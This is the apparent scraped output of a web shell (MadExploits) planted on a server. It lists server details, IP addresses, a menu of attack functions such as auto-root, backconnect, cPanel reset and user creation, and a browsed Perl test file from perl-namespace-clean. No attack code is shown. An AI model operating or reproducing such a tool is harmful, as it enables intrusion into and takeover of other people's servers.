Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-namespace-clean /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
00-basic.t
347
B
-rw-r--r--
01-function-wipeout.t
676
B
-rw-r--r--
02-inheritance.t
737
B
-rw-r--r--
03-unimport.t
427
B
-rw-r--r--
04-except.t
756
B
-rw-r--r--
05-explicit-cleanee.t
1.6
KB
-rw-r--r--
05-syntax-error.t
178
B
-rw-r--r--
06-other-types.t
1.41
KB
-rw-r--r--
07-debugger.t
660
B
-rw-r--r--
07-pseudo-debugger.t
405
B
-rw-r--r--
08-const-sub.t
162
B
-rw-r--r--
09-fiddle-hinthash.t
860
B
-rw-r--r--
10-pure-perl.t
1.93
KB
-rw-r--r--
11-multiclean-in-scope.t
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 09-fiddle-hinthash.t
use strict; use warnings; use Test::More tests => 4; { package Bar; use sort 'stable'; use namespace::clean; use sort 'stable'; { 1; } Test::More::pass('no segfault'); } { package Foo; BEGIN { $^H{'foo'} = 'bar'; } use namespace::clean; BEGIN { Test::More::is( $^H{'foo'}, 'bar', 'compiletime hinthash intact after n::c' ); } { BEGIN { Test::More::is( $^H{'foo'}, 'bar', 'compile-time hinthash intact in inner scope' ); } 1; } BEGIN { SKIP: { Test::More::skip( 'Tied hinthash values not present in extended caller() on perls older than 5.10' .', regardless of mode (PP or XS)', 1 ) if ("$]" < 5.010_000); package DB; Test::More::is( ( (caller(0))[10] || {} )->{foo}, 'bar', 'hinthash values visible in caller' ); } } }
Close